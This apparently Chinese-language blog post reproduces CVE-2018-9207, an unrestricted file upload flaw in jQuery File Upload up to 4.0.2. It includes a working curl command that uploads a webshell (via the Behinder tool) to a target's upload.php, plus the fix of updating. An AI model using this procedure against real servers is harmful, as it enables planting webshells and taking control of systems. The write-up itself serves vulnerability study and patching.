CVE-2018-9207 jQuery文件上传漏洞复现

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档


漏洞描述

提示:这里可以添加本文要记录的大概内容:

jQuery file upload是一个文件上传小工具,包含多个文件选择,拖放支持,进度条,验证和预览图像,jQuery的音频和视频。支持跨域、分块和可恢复文件上传以及客户端图像大小调整。适用于任何服务器端平台——支持标准HTML表单文件上传(PHP,Python,Ruby on Rails,Java,Node.js,Go等)。

这个漏洞产生主要是因为jQuery-File-Upload的.htaccess文件会限制文件的上传和文件的执行,但是Apache的2.3.9版本中,Apache默认不再支持.htaccess了,而且默认是没有被开启的,所以导致攻击者可以任意上传脚本文件并执行。如果使用了另一种web容器的话(比如Nginx),那么基于.htaccess文件的保护则完全无效。


提示:以下是本篇文章正文内容,下面案例可供参考

影响范围

jQuery Upload File <= 4.0.2


漏洞复现

1.首先准备好木马shell.php (可以直接使用冰蝎)

2.访问环境:

	http://ip:8080/jquery-upload-file/php/upload.php

3.通过curl命令把shell.php上传到服务器

	curl -F "myfile=@shell.php" "http://ip:8080/jquery-upload-file/php/upload.php"

在这里插入图片描述

4.连接冰蝎进行验证

在这里插入图片描述


漏洞修复

更新jQuery file upload至最新版本

https://github.com/blueimp/jQuery-File-Upload

文章参考 http://cn-sec.com/archives/1005715.html ,仅供学习使用!

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值